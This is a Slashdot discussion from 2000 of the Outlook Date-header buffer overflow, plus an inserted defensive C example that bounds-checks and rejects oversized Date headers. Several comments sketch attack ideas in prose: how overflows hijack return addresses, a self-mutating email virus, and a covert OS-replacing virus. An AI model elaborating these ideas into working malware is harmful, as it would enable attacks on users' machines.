      ...It is your attitude that allows them to engage in monopolistic business practices. If you don't like their products - and it's obvious that you have serious issues with them - then instead of whining about it on /. just stop doing business with Microsoft...

      I wish things could be that simple. I'm currently setting up some machines for my folks. When I suggested an OS other than MS, they requested Windows not because of the OS but the application software they want to run on it (in this case accounting software.) The alternatives on Linux for example are not an option as we (.au) have recently implemented GST (goods and sales tax). As there is no *nix port of their software (MYOB), they have no choice. Though I have heard mumbles of a Linux port on my local LUG.

      --
      peterrenshaw ~ Another Scrappy Startup
    5. Re:Outlook Express required to fix? by |DaBuzz| · · Score: 2

      Finally, I end virtually every post this way: if your employer "forces" you to use this stuff, just remember that in most countries you can always quit.

      So your suggestion is that I should up and QUIT my chosen profession which happens to be a PDA and Mobile electronics analyst where I'm senior editor of a *very large* site devoted to the subject. A site that is my *full time job* where 99% of the products and services we cover have direct ties to the most popular PIM on earth, Outlook 97/98/2000.

      Yeah, I'll just up and quit because you've convinced me that Microsoft's integration that requires components of software packages that you DO NOT WANT just to fix a security problem is all my fault, you're a brilliant man ... I've always wanted to pump gas for a living anyway, I guess it's better than "whoring".

      (If only life were as simple as the self indulgent zealots try to make it seem.)

    6. Re:Outlook Express required to fix? by The+Man · · Score: 2
      There is no choice.

      Rubbish. I don't use anything from Microsoft, and haven't for at least 4 years. You and everyone can do the same. Fact is, most people don't care enough about the issue to do the necessary investigation to take this step.

      The suit against Microsoft is tripe and nonsense. The only way anyone can have a monopoly is if people choose - yes, choose - to do business with them. Sorry, you lose on this one because the argument is irrefutable. No business, no profits, no market share. There is a choice. There is always a choice.

      Whoring: just don't do it.

    7. Re:Outlook Express required to fix? by The+Man · · Score: 1
      So your suggestion is that I should up and QUIT my chosen profession which happens to be a PDA and Mobile electronics analyst where I'm senior editor of a *very large* site devoted to the subject. A site that is my *full time job* where 99% of the products and services we cover have direct ties to the most popular PIM on earth, Outlook 97/98/2000.

      I'm suggesting that you have a choice. That "my employer forces me to" is a whine and a cop-out, not a valid excuse. If you choose to work for them, you make a choice. Nobody is forcing you to do anything. So what I'm suggesting is that you have roughly three choices: a) change your company's direction, b) not complain about Microsoft because you are keeping them in business, or c) quit and do something else.

      Quite frankly, I don't care which you choose. It doesn't affect me either way. BTW, you aren't impressing me with your title and so forth. If you don't like Microsoft, you are a whore for doing that job. Accept it along with your Lexus and your trophy wife. I'm not trying to bait you. I'm trying to show you that what you see as a "practical" decision, or maybe not a decision at all, is in fact a conscious disregard for whatever values you may have in exchange for money.

      I make a nice living too. I just don't sell out for it. There is no Microsoft in my life, nor will there ever be. I don't intend to pump gas, but if that's my only choice, I'll gladly take it.

      Whoring: Just don't do it.

    8. Re:Outlook Express required to fix? by The+Man · · Score: 2
      I wish things could be that simple.

      Then you failed to grasp the whole point of the post. It really is just that simple.

      Whoring: Just don't do it.

  72. Re:MSNBC reports Microsoft Security Hole? by bakreule · · Score: 1
    It's good to see that a Microsoft owned news service can still cover security bugs in Microsoft products.

    Hmm.. I wonder.....

    "The only defense against the vulnerability is installing the Microsoft patch, which will be available shortly on the Microsoft.com security Web site."

    How about not using Outlook? I also love the "Microsoft profits top Street forecasts" link in the middle, when in fact MSFT stock has plummeted today (5.25 points as of this time).

    I had hoped that NBC would retain its journalistic integrity, even when partnering with Satan, but it looks like they're under the control of Billy Boy. Sigh, one less news source to trust.

    Someone else said this, but I REALLY love the "you can fix this now by installing IE 5.5!!!". Really makes you wonder, and I'm not a conspiracy freak.......

    I wonder if MS has spent the time since June (when the article said they found out about it) fixing the bug, or if they've spent it all figuring out how to exploit it and get people to dl IE5.5

    That brings up another question. The article specifically says that people can protect themselves "immediately" by downloading IE5.5. So did MS know all along about this bug? What could possibly be in IE5.5 that would fix an Outlook bug? Exactly how long did they know about this? And for the conspiracy people, did MS create this bug to exploit at a future date? How much of this is a genuine "Damn, let's fix this bug!".....

    Let's forward all of this to the Justice Dept. I think they really should have the members of /. on their advising panel.

    --

    Buses stop at a bus station
    Trains stop at a train station
    On my desk there's a workstation....

  73. Re:How long can they keep this up? by cyber-vandal · · Score: 1

    Point me to a URL where Microsoft were 'held accountable' for their software not working properly by a large corporation. The truth is that the EULA has recently been upheld in a court of law by a company that lost $1.5M due to a company's poor software, so you are dependent on MS to be bothered to fix a problem. With OSS you can hire someone to do it for you, or you can inform the author who 99 times out of a hundred will fix it for you.
    Accountable to the market is a hilarious statement. The people that choose the software are rarely the ones that have to work with it, they're the ones making IT staff work extra hours to get the damn thing in.

  74. Re:Bugtraq by dAzED1 · · Score: 1

    We use Lotus Notes (yuck!) here, so I don't mind educating people on this new hole (I've never heard of any LN exploit)

    yuck, eh? Do you see how in this one sentence you've said something rather strange? You don't know of any exploits with lotus notes, yet you don't like the product. hmmm...strange

  75. Planned fix by dagoalieman · · Score: 2

    In an email from our IT division that I received recently, I read that SANS hopes to be using a "virus" email patch- a virus email that exploits the problem to quietly patch it.

    Neat idea, using a virus to fix it and stop others, if it works...

    Below is the email I received from our IT (via SANS):

    >I am forwarding this note to you as a FLASH because the vulnerability
    >it describes is probably the most dangerous programming error in Windows
    >workstation (all varieties -- 95, 98, 2000, NT 4.0) that Microsoft has
    >made.
    >
    >You are vulnerable to total compromise simply by previewing or reading
    >an email (without opening any attachments) if you have one of the
    >affected operating systems and have the following installed:
    >* Microsoft Access 97 or 2000
    >* Internet Explorer 4.0 or higher, including 5.5 (Windows 2000 includes
    > IE 5
    >
    >SANS Prize: It may be possible to fix this vulnerability automatically,
    >via an email without asking every user to take action. The concept is
    >similar to using a slightly modified version of a virus to provide
    >immunity against infection. SANS is offering a $500 prize (and a few
    >minutes of fame) to the first person who sends us a practical automated
    >solution that companies can use, quickly, easily, and (relatively)
    >painlessly to protect all vulnerable systems.

    --
    We don't need no Net Explorer We don't need no Thought control
  76. Re:sorry but , no by mangino · · Score: 3

    This is absolutely and completely false. Almost every buffer overflow is exploitable. All you do is to overwrite the memory space with code to execute. The key is to overwrite the return address to that of your custom code, that way, when the function returns, it actually jumps into your code. This can be done with Eudora, or Pegasus, or anything else. The key is that the message you use to overflow the buffer must contain executable code.

    There is nothing that says overflow... execute all commands after as superuser, all commands are executed as the regular user. The problem with Windows is that there isn't a good distinction. Root exploits typically come from programs running as root or setuid root. That is why people recommend that you drop privileges ASAP and run as much as possible in a chroot jail.

    There are actually several things you can do to fix this; the easiest one is to make the stack non executable. There are some patches from Solar Designer for Linux that do just that. Linux, unfortunately, likes to use the stack as a place to execute signal handling code.
    --
    Mike Mangino
    Sr. Software Engineer, SubmitOrder.com

    --
    Mike Mangino
    mmangino@acm.org
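
Added example, not part of any comment above and not code from Outlook or any other mail client: a C sketch of the bounds check whose absence the thread is describing, applied to a message's Date header. The 64-byte cap, the function names and the sample messages are assumptions made for this illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DATE_MAX 64 /* assumed cap for this example; a normal Date value is ~31 bytes */

enum { HDR_OK = 0, HDR_MISSING = -1, HDR_TOO_LONG = -2, HDR_BAD_CHARS = -3 };

/* Constructed sample: a well-formed header block followed by a body. */
const char SAMPLE_OK[] =
    "From: a@example.com\r\n"
    "Date: Wed, 19 Jul 2000 10:15:00 -0400\r\n"
    "Subject: hi\r\n"
    "\r\n"
    "body\r\n";

/* Return a pointer just past "name:" on a header line, or NULL.
 * The search stops at the blank line that ends the header block. */
const char *find_header(const char *msg, const char *name)
{
    size_t n = strlen(name);
    const char *p = msg;

    while (*p && *p != '\r' && *p != '\n') {
        size_t i = 0;
        while (i < n &&
               tolower((unsigned char)p[i]) == tolower((unsigned char)name[i]))
            i++;
        if (i == n && p[n] == ':')
            return p + n + 1;
        p = strchr(p, '\n');
        if (!p)
            return NULL;
        p++;
    }
    return NULL;
}

/* Copy the Date value into out, never writing more than outsz bytes.
 * The unsafe pattern this replaces is a fixed buffer filled by an
 * unbounded copy (strcpy/sprintf) of whatever the sender supplied. */
int copy_date_header(const char *msg, char *out, size_t outsz)
{
    const char *p = find_header(msg, "Date");
    size_t len = 0;

    if (outsz == 0)
        return HDR_TOO_LONG;
    out[0] = '\0';
    if (!p)
        return HDR_MISSING;
    while (*p == ' ' || *p == '\t')
        p++;

    while (*p) {
        unsigned char c = (unsigned char)*p;
        if (c == '\r' || c == '\n') {
            const char *q = p;
            if (*q == '\r') q++;
            if (*q == '\n') q++;
            if (*q != ' ' && *q != '\t')
                break;                 /* end of this header */
            p = q;                     /* folded continuation line */
            continue;
        }
        if ((c < 0x20 && c != '\t') || c >= 0x7f) {
            out[0] = '\0';
            return HDR_BAD_CHARS;      /* a date has no control or 8-bit bytes */
        }
        if (len + 1 >= outsz) {
            out[0] = '\0';
            return HDR_TOO_LONG;       /* reject instead of truncating silently */
        }
        out[len++] = (char)c;
        p++;
    }
    out[len] = '\0';
    return HDR_OK;
}

/* Gateway-style check: 1 if the Date header should be treated as hostile. */
int date_header_suspicious(const char *msg)
{
    char date[DATE_MAX];
    int rc = copy_date_header(msg, date, sizeof date);
    return rc == HDR_TOO_LONG || rc == HDR_BAD_CHARS;
}

/* Build a constructed message whose Date value is n filler characters. */
int make_long_date_msg(char *buf, size_t bufsz, size_t n)
{
    const char head[] = "From: a@example.com\r\nDate: ";
    const char tail[] = "\r\n\r\nbody\r\n";
    size_t hl = sizeof head - 1, tl = sizeof tail - 1;

    if (hl + n + tl + 1 > bufsz)
        return -1;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', n);
    memcpy(buf + hl + n, tail, tl + 1);
    return 0;
}

int main(void)
{
    char msg[4096], date[DATE_MAX];
    int rc = copy_date_header(SAMPLE_OK, date, sizeof date);

    printf("normal message:  rc=%d date=\"%s\"\n", rc, date);
    if (make_long_date_msg(msg, sizeof msg, 2000) == 0)
        printf("oversized Date:  rc=%d suspicious=%d\n",
               copy_date_header(msg, date, sizeof date),
               date_header_suspicious(msg));
    return 0;
}
```

Rejecting the oversized value outright, rather than truncating it, also gives a mail gateway something to log and quarantine on.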
  77. Can we say "Lotus Notes?" by zookie · · Score: 1
    Most anyone involved in choosing a LARGE enterprise mail system will look at both Microsoft Exchange and Lotus Notes. On a point-by-point comparison, Notes is just as competitive as Exchange (yes, even with calendaring and scheduling). Hell, it wasn't until the last couple of years that Exchange was even a competitor to Notes.

    I'm not saying Notes is perfect, but to imply that Microsoft is the only game in town is far from the truth.

    1. Re:Can we say "Lotus Notes?" by NetJunkie · · Score: 2

      I'll agree with that. Notes has a lot of good things going for it. But, having used the Notes client it just isn't as good as OutLook. The backend stuff is nice but the front end isn't.

  78. Re:Bugtraq by MostlyHarmless · · Score: 2

    Although that's an important security hole in its own right, it's not the one we're talking about in the article. The article involves a buffer overflow in the date field, not an oops when executing ActiveX objects that are databases.

    --
    Friends don't let friends misuse the subjunctive.
  79. Re:Just publishing a patch isn't going to fix this by jbrw · · Score: 4

    Win98 has an optional feature that will periodically contact Microsoft when you're connected to the internet to download a list of updates/patches, etc. Apparently no information is sent to Microsoft. All very similar to Helix Gnome.

    Of course, OS/2 was doing this in about '94 (via gopher rather than http, if I remember correctly).

    ...j

  80. Viruses and genetic code by mrogers · · Score: 1
    Now if I was evil I might see this as an opportunity to make a large-scale test of genetic algorithms. The code would email imperfect copies of itself to everyone in the user's inbox. Most mutations would just ruin the virus and crash the recipient's copy of Outlook, but some might result in improvements (self-encrypting code, etc). Variety would make it much harder to identify infected emails, so even "junk DNA" which was not executed could be useful.

    $ cat < /dev/mouse

  81. sorry but , no by Lumpy · · Score: 1

    This is only a problem with "feature Jammed" software. Most email clients will not run attachments, or any code in an email message; it happens that only Microsoft, right now, had the stupid idea of doing this. If you buffer overflow Eudora or Pegasus it just dies. Kinda like Pine... it dies (or core dumps); they don't go (overflow.... execute all commands after this as superuser).

    I wish there was more detailed info on this exploit.

    --
    Do not look at laser with remaining good eye.
  82. Re:My favorite line in the article by photon317 · · Score: 1

    Also, notice on the main security page that the ordering of the security bulletin numbers don't line up with the published dates. This seems like hard evidence that they don't inform their customers of these security problems quickly in the order received, but rather whenever they finally get around to having some half-answer (which will be days after bugtraq and the like have eaten it up).

    --
    11*43+456^2
  83. Re:Swiss cheezzz by skinnymofo · · Score: 1

    ^=U hey, AC do you know what anal retentive means??

    --
    Happiness is like peeing yourself, only you can feel the warmth.
  84. Re:Bugtraq by Chalst · · Score: 1

    This has nothing to do with by design security flaws. It's a worm that propagates using a buffer overflow: just like the countless UNIX worms.

  85. Outlook Express eh? by /Idiot\ · · Score: 1

    this one always makes me giggle... Why is it that Outlook Exprs and Outlook share the same name but not a line of code? And then why is it that MSDE came from the SQL7 code but it's not called SQL Anything?
    Wouldn't it be better to call Outlook xprs "Just a mail client2000" and MSDE "not quite a database engine2000" :)

    --
    /dev/Idiot/
  86. It's not about Suckage, it's about Security. by Tildedot · · Score: 5
    You said:
    I'd like to see all the "MS SUCKS!!!" people in here sit down and write an app that does everything OutLook can do. Yes, it has its problems but you can patch it, just like everything else. Until there is another alternative, even a close one, people won't switch.

    Newsflash: Some Companies Don't Use Outlook.

    We don't. Why is that? Is it because we have a single app that does everything Outlook can do? No. Did management like its scheduling? Yeah, they were impressed. But, I wasn't hired to point, click, giggle, and approve everything Management wants to run. It's part of my job to build viable systems for my company. So, before we pop for a system, we audit the crap out of it: Outlook/Exchange doesn't even come close to cutting it, "features" or not.

    See, we have a different view on the Web. An example: Since our first purchase of bsafe licenses from RSA labs, some 5 years ago, we've run a secure inter- and intra-net for our clients and employees. Scheduling, Calendars, Mail, Document Sharing/Transfer, Routing, Storage, Directory Services, some B2B and Timesheets, Printing and PDF generation from Word Documents and Faxes.

    As for bugs; well, we're always in development :^) We've had several minor security issues, some early ones were, like this, bounding checks that didn't. Some memory leaks in 3rd party libraries. A few browser issues. Harmless stuff. Never whacked a file, or accessed secure information without the consent of the user. Never. As lead developer, I can honestly claim that our product easily does more than Outlook, and is virtually browser independent (SSL the only requirement). (Of course, you could just shitcan my comment, because it's a Server app, and not a Win client app, and we don't sell it, and..and...:)

    Anyway, I can walk the walk. So, let's talk the talk.

    There is no excuse for shoddy code and poor design at the Enterprise level. None. There are tons of relatively inexpensive tools that take care of beginner mistakes (like bound checking) for you, and may I remind you Microsoft should not be a beginner. Where are the coding wizards that bloated the Doom egg into Excel? And don't even start to whinge to me about "so many lines of code crap", either. I don't care how many lines you bloat into a product: if the design is poor, you're in for the big lose. And, make no mistake about it, the VBScript security concept is simply Nonexistent. A pathetic afterthought -- a late-night crapfest of coding that makes the I_Love_You virus read like Shakespeare.

    To make matters worse, Microsoft leveraged the farm on the VB Concept. Every "application" has a backdoor^h^h^h(Screw it, it's a backdoor) propped open wider than the fridge at an "All-you-can-drink" Mardi Gras party in the Big Easy.

    Uh...Wait...My Spidey Senses are telling me that the party line at Microsoft is that all this scriptability is The Big Win for productivity! Really!! You can cut/paste/drag/drop/bone/fillet/chop bits between all your apps! Isn't that exciting? Huh? Don't you want to be able to execute arbitrary code from an Excel spreadsheet, popped open by an untrusted 3rd party .OCX, driven by an Access 02 database automagically opened in Word?!? MmmmBoy!!! Smell That Innovation!

    Got some not-so-much-news for you guys. That mind-numbing stench isn't innovation. It's a deceptively high-minded concept for individual power users, viciously mangled by Microsoft's complete inexperience with the multi-user/internet like some lean ground beef chew toy tossed to a pack of rabid weasels. 99.99% of the world doesn't use it, doesn't want to use it, and couldn't care less about it. The 0.01% that recognize its existence are about equally divided on the subject: Either they've already disabled VBScripting on their machines, or they're writing code to exploit the other 99.99%

    Would you be happy with a caretaker for your house that leaves the key in the lock and puts up a sign that says "Gone Fishin' 'till Tuesday"? And they knew about it since they shoehorned basic scripting into Word 95. It is beyond my comprehension why people believe that scripting viruses "just happen", like they're some Normal price of doing business. You hear crap like "That Loser who wrote this virus should be shot!", or "We lost (m|b|tr)illions of dollars to Melissa/Zipped_Files/Good_Times, someone should pay!!!" And the folks never take the time to think

    "Why was it so damn easy to do?"

    Because they made it easy to do. I mean, LOOK AT THE CODE, folks. Melissa and its ilk are hardly rocket science. I_Love_You.vbs isn't a freakin' masterpiece. It's a script that should never have been allowed to run. Where's the security!!! Aunt Sally and Uncle Bob didn't want to run it. They don't know VBScript from Shinola. Yet, it ran on their box. Without their consent. Without their knowledge. And whacked all their files and mailed all their friends -- who continued the cycle.

    What do you hear from Microsoft: "You have to stay Vigilant!" and "Those Devious Geniuses! They Struck Again!", and the popular "No System Is Ever Free Of Bugs" They crank up the spin-fest and fill Joe User's head with cheezy crap that sounds like it came off a bottle of cheap shampoo: "Upgrade, Set Options, Pray, Repeat!"

    It never, ever had to be that way...

    Thanks for listening...

  87. Everyone? by Felinoid · · Score: 1

    >and certainly everyone should upgrade when the fix is made available.

    Just being an asshole here :)
    Everyone? But how am I gonna apply it to my Linux box?

    The point is good though...

    I want to scream whenever I hear someone say "But the user never upgrades"...
    That's the user's defect... bugs happen... user doesn't bugfix he is SOL.
    Hey I mean where the hell do companies like Microsoft make money when people don't upgrade?

    --
    I don't actually exist.
  88. Re:Bugtraq by kel-tor · · Score: 1
    most people don't like the product because it is a huge slogging hog... as a webserver, the domino component is quite nice however (once you figure out how to install it into your distro that is)


  89. Re:?us? and them by kiscica · · Score: 1

    I'm not sure I understand what your beef is here. I certainly am not stipulating that Microsoft is "not all bad." I just don't believe that the fact that one of their programmers committed an inadvertent buffer overflow error is evidence of evil (if it were, then basically any assemblage of modern programmers, e.g. the loosely bound ones that are responsible for modern open source Unix distributions, would have to be judged by the same standard).

    Microsoft has committed plenty of -advertent- (I know there is no such word, figure it out) acts of evil, and I have no problem with attacking them for such, though doing so hardly constitutes a major portion of my life.

    Look, Microsoft was essentially irrelevant to me up until 1995 or so, since until then I rarely if ever "used" a computer -- I was too busy hacking on them, as I have been doing for the past twenty-three years or so, in the following environments: (in roughly chronological order) "bare metal", VAX VMS, LISP machines, and Unix. To this date I have written perhaps 2000 lines of code in an MS-DOS (not Windows) environment and that under duress.

    Back then, the word "user" was virtually an insult, and I would have had to call you outside, BlueUndies, for characterizing me as a "Linux user" :-). Nowadays, however, we are, willy nilly, almost all users some of the time, even those of us who are programmers and hackers first and foremost. And even if we are Linux users, we are using our Linux in the midst of a net saturated with Windows desktops. So Microsoft is no longer irrelevant, even to me, even if I never use their sucky software.

    But for heaven's sake, if we are going to attack them, let us do so based on their intentional Bad Decisions and Evil Moves and not for a programming mistake that, encouraged by a long-standing flaw of our common programming environment (C and the C library!), is rampant among programmers on every platform out there!

    kiscica

  90. There must be some kind of mistake. by leo.p · · Score: 5

    The W2K update button on my start menu informs me only that I should update to Media Player 7.

    1. Re:There must be some kind of mistake. by OmniFool · · Score: 1
      --
      This post does not exist
  91. Re:Dumb Q by Caspuh · · Score: 1

    The Exchange CLIENT was merged into Outlook....not Exchange Server. Go sit in the corner.

  92. Microsoft Innovation! by superyooser · · Score: 1
    This is the kind of innovation that makes Microsoft such a great company! Look at this note from a FIN site visitor:
    "I fully intend to e-mail my representatives, and I hope they realize the important impact that Microsoft has had on the computing industry alone, and ALL the other industries as well."
    Yes, you go ahead and send them that email from Outlook... hehehe I'm sure they'll be bowled over by your persuasive argument and buffer overflows.

    FIN (Freedom to Innovate Network) should be VIN (Virus Innovation Network).

  93. Lotus Notes by Remote · · Score: 1

    The program is painfully slow to start and close. It's a memory hog. Has horrible UI. Concepts are counter-intuitive. Menu option names are cryptic. Gadgets are the worst I've ever seen. I haven't yet figured out how to see the headers. Even the sender's full address isn't shown in the mailbox window. Parts are translated, parts are not. I could go on with this all day long.

    And maybe exploits aren't common because of the small installed base.

  94. Re:Date? by pSyk · · Score: 1

    hahah funn-n-ny

  95. Spruce and Evolution by catscan2000 · · Score: 1

    Good thing I use Spruce and Pine ;). Does anyone know if Evolution is almost ready yet?

  96. At least it's easy to fix by AlpineR · · Score: 1

    All they need to do is send every user an e-mail that will exploit the bug to automatically install the patch. That's quite a convenient feature! ;-)

  97. Re:How long can they keep this up? by sredding · · Score: 1

    Hmmmm... Flamebait... Must've struck a nerve. Score this as redundant then.

    IMNSHO, it can't possibly be "massive" if I had the fix installed BEFORE I even heard of the security hole.

    Of course, YMMV.

  98. Re:?us? and them by BlueUnderwear · · Score: 1
    > I'm not sure I understand what your beef is here.

    My beef was that you were attempting to misrepresent your own background: This could have happened to ?us?, where us was supposed to mean the Linux/Unix community. However, your question marks gave you away, and in a rather spectacular way at that. Think about a Frenchman, saying, in a very thick French accent "I am prored to bee an Americanne". Funnily the question marks appeared around that very word that was the lie. Mind this little detail next time you try to impersonate the moderate Linux proponent.

    > Back then, the word ?user? was virtually an insult

    I would consider ?user? an insult too. But I have no beef with being called a user. My rant has nothing to do with user vs developer vs designer vs master architect vs whatever. I only used the words Linux user, as I could have used any other number of words such as Linux fan, Linux aficionado, penguinista or Linux proponent, etc. It's interesting that you feel more insulted by being called a user than being called a liar.

    --
    Say no to software patents.
  99. Re:Bugtraq by Mike1024 · · Score: 2

    Hey!

    People are still using IE 3.0!

    Unfortunately, many updates are not worth doing for the majority of people. If IE 3.0 does what you want, you shouldn't have to make a 2-hour plus download just to stop a bug that shouldn't have existed in the first place.

    Another problem with upgrading is what I call the 'Bullshit program' problem. On my Windows box, I use Office 97. I saved a word file and sent it to a friend. It was just under 1.5 MB. He uses Word 2000, and a while later, e-mailed me the file back, for reasons I won't go into. It had grown to 4Mb, and was in the Word 2000 format, which I couldn't open. I e-mailed him and asked what he had changed in the file, other than the format. He said: Nothing.

    Many upgrades give the average user nothing more than features like OS integration and annoying talking paper clips. Which they don't want. These 'upgrades' regularly have a large download time and/or price tag.

    I blame Microsoft. After all, this IS Slashdot.

    Michael Tandy


    ...another insightless comment from Michael Tandy.

    --
    "Goodness me, how unlike the FBI to abuse the trust of the American public." -- The Onion
  100. Dumb Q by FascDot+Killed+My+Pr · · Score: 1

    If the exploit happens "before the message hits the Inbox", how can it be an Outlook problem? Isn't putting items in the Inbox a function of the server?
    --

    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
    1. Re:Dumb Q by Rombuu · · Score: 1

      The article on /. is kind of misleading (heh, go figure)... the mail in question does have to be d/l from the mail server before anything can go south.

      --

      DrLunch.com The site that tells you what's for lunch!
    2. Re:Dumb Q by sg_oneill · · Score: 1

      Depends on what you mean by an INBOX. However, by this I assume it means that it fries stuff when MAPI gets its hands on it, and before handing it over to Outlook. That means it'll fry 3rd party exchange clients etc too. badbadbad

      --
      Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
    3. Re:Dumb Q by .c · · Score: 1

      Silly question... but why not just parse mail at the server, stripping anything out that doesn't follow the usual Date: formats?

  101. Re:/., please... stop whining. by handorf · · Score: 2

    Look at it this way instead...
    The most popular desktop operating system and office package in the world, the one that MANY /.ers have to help maintain, has a HUGE vulnerability.

    I'm glad to find this stuff on /., but maybe we want a "MS Security Issue" section started.

    --
    -- IANAEG - I am not an elder god.
  102. Pointing fingers at the infrastructure by SnakeStu · · Score: 2
    It's very easy to blame Microsoft for letting a buffer overflow problem like this slip through. Just dump Outlook, right? Use [insert favorite non-MS product name here] instead and everything will be fine...

    ...not. While I am certainly not willing to excuse Microsoft in particular for this specific instance, it is unwise at best to assume that the same type of weakness does not, or will not in the future, exist in other, competing products. Given that software developers have shown, time and again, that they are unable or unwilling to catch and prevent this type of weakness from getting through, perhaps it's time to look for a stronger solution.

    Specifically, perhaps it is time to fix the infrastructure -- in this case, Internet mail as a whole. Although it would be unfair to compare it to something as weak and outdated as QWK mail from the ol' BBS days, there are abundant weaknesses in the current model for Internet mail that allow nasty things like mail header security exploits. And spam. Imagine if spam was not just antisocial and/or illegal, but technically impossible?

    How long can a date field be? For that matter, how long can any header field be? (No, I'm not asking for a technical answer based on the current system, I'm suggesting that you think about the meaning of the fields, and the maximum length necessary to impart that meaning.) Given that mail client software authors are demonstrably ignoring such length limitations, is it not time to enforce at the protocol level some basic validity and, ideally, permission from the recipient?

    I don't have a blueprint to roll out for you. However, as long as we focus on the weaknesses of this or that client, server, company, etc., we are missing the boat.

    1. Re:Pointing fingers at the infrastructure by tftp · · Score: 1
      Infrastructure is good enough. The problem is not there.

      How long can a date field be? [...] is it not time to enforce at the protocol level some basic validity?

      This would assume that we trust data because the data is now supposedly correct. Then an obvious exploit would be to forge invalid data!

      The Right Way to fix the buffer overflow here is to assume that data is incorrect in any possible way - too long, too short, contains unexpected characters (like zeros) etc. etc. So the software does not depend on the data that it is processing.

  103. Re:VIRUSES, not virii idiot by afc · · Score: 1

    What do generalization and wit have to do with ignorance and silliness?
    --

    --
    Information wants to be beer, or something like that.
  104. Re:Wow..... by Ralph+Wiggam · · Score: 2

    Other people are going to yell "monopoly", but I have a different take on it. I work at a small company, and on occasion I develop custom software for our clients. My bosses are really cool guys that understand the work I do, and if I tell them that I don't have 100% confidence in something I wrote, it doesn't leave the door. At MS, it seems that marketing is completely running the show and they have no clue what the nerds are doing. I can see things like fiscal years and competitor release dates causing MS managers to yank unfinished software away from the engineers. It's a good way to make lots of money and produce really awful software.

    -B

  105. MSNBC reports Microsoft Security Hole? by billnapier · · Score: 1

    It's good to see that a Microsoft owned news service can still cover security bugs in Microsoft products.

    1. Re:MSNBC reports Microsoft Security Hole? by BenHmm · · Score: 3

      ah, but then again:

      the cure recommended so far is for everyone to upgrade to IE5.5 as soon as possible

      Now THAT'S marketing.

    2. Re:MSNBC reports Microsoft Security Hole? by jd · · Score: 2
      This was reported by the SANS Institute, yesterday, and therefore MSNBC presumably felt trapped between the Devil and the deep blue sea. Drown in complaints or get fried by Red Mond.

      I find these sorts of holes fascinating, especially in light of Microsoft's sales pitch of selling C3 secure systems. (Yes, this is the least secure you can get, and still get a rating, but the badge is still being used to promote the idea that Windows is secure.)

      One thought I had, after reading this news - if WINE could be made sufficiently stable & complete, it shouldn't be too difficult to write a virus which replaced MS' Windows with Linux, without the users even noticing. Do that, and Linux could subvert 98% of the desktops on the Internet within a matter of days.

      (Wouldn't this be, well, illegal? Not if you put a shrink-wrap licence on the virus, which stated that running the virus constituted the user's agreement to the OS switch. If the licence failed to appear, and the virus ran without the user being able to detect it, well, that becomes a Microsoft issue, not a viral one.)

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    3. Re:MSNBC reports Microsoft Security Hole? by billnapier · · Score: 1

      Now we see how Microsoft holds onto that lead over netscape. I wonder what extra benefits the programmer that "introduced" that bug got.

  106. 2000-07-18 17:57:54 Major MS Windows Vulnerability by GeekLife.com · · Score: 2

    (rejected)

    I wonder how many people submitted that. I put mine in about an hour after this TechWeb article came out.

    It'd be cool to see some cut-away of the slashdot experience. Like, are the posters the ones who hit reject or accept? Is there an early team that does some filtering? Is one nay enough to reject an article, or do a few people look it over?
    -----

  107. nothing to get excited about by grizzo · · Score: 1

    the fact is, these things are going to continue happening until finally something comes along that causes outlook to format the hard drives of everybody who uses it. a shame, to be sure, that all those people will lose so much information but hey that's what you get for using outlook. or eudora. or whatever else you use. bottom line: stop worrying about viruses and accept that someday you will probably be the victim of one, and just hope that day doesn't come too soon (or hope you're smart enough to avoid it... either way, not much you can do).

    --
    grizzo: totally insecure, but very convenient.
    1. Re:nothing to get excited about by petis · · Score: 1

      Hmm, maybe an insurance covering the risks of losing information because of viruses will be available in the future? In the last cryptogram from counterpane they announced an insurance, covering:

      "1. Internet Asset and Income Protection Coverage provides insurance for Counterpane's Managed Security Monitoring customers who incur a loss of or damage to information assets resulting from a breach of security or technology failure. Also covers business interruption due to loss of use due to a breach."

      (See http://www.counterpane.com/pr-lloydssl.html)

      Not sure if virus attacks count as "technology failure" or "breach of security" though..

  108. Alternatives to Outlook? by abischof · · Score: 1
    At work, we're a win32 shop.. But, even worse, I have to use Outlook for my email client, since the mail server runs Exchange (no POP/IMAP if I understand correctly).

    Anyhow, does anyone know of any alternative email clients that will work with the "Exchange mail protocol" (or whatever it's called)? It's not so much Outlook's security problems that I'm trying to avoid, but I don't particularly like its interface either ;).

    Alex Bischoff
    ---

    --

    Alex Bischoff
    HTML/CSS coder for hire

  109. Re:VIRUSES, not virii idiot by pohl · · Score: 1

    clue-4-u, u silly grammar-nazi.

    --

    The "cue the foo posts in 3, 2, 1..." posts will commence with no subsequent foo posts in 3, 2, 1...

  110. Re:outlook just cant be fixed by Chalst · · Score: 2

    You could say the same about sendmail.

  111. Re:Not really by AllynKC · · Score: 2

    Per posts in NTBugTraq, the actual bug is within Internet Explorer, and is made visible in Outlook and Outlook Express due to calls to the faulty code.

    The bug has been fixed in IE 5.01 SP1; so there already exists a solution to avoid the bug on a Win box. Also, on Win-9x, IE 5.5 also avoids the bug; but on W2K, IE 5.5 still carries this bug (go figure).

    In my opinion, any bug fix from MS isn't going to accomplish much. The majority of systems which are reportedly vulnerable are home systems where the users have failed to download the readily available SW upgrades. If the users failed to download the upgrades, I doubt it's likely that they'll get around to downloading the bug fix either.

  112. Why use outlook. by cokane · · Score: 1

    Okay, I really don't see what's so great about using outlook. It is obviously an extremely inferior product that Microsoft has been able to push using their Windows Operating System. I know plenty of people that are forced to use this crap because of their work. Perhaps it's time that companies stop using shitty products like this because some idiot with an MCSE tells them to because they didn't learn any better (no, I am not implying MCSE's are idiots, but an idiot with an MCSE is a dangerous entity, you can all admit that). The administration tried to get our university to switch to backoffice for their mail servers so that everyone would have to use outlook for the integration with MS Schedule+. Our NE guys just laughed at them. If we replaced our AIX servers with NT boxen running NT it would be crash city. Face it, MS makes crap and everyone keeps buying it, just stop and ACTUALLY DO RESEARCH FOR A CHANGE. Perhaps then you will spend $1000 on a brand new system that does not crash and does not have blatant security holes and has a logical GUI.

  113. Re:My favorite line in the article by ameoba · · Score: 1

    Something about this sounds surprisingly similar to the way that the authorities reacted to HIV/AIDS when they were finding out about it...

    --
    my sig's at the bottom of the page.
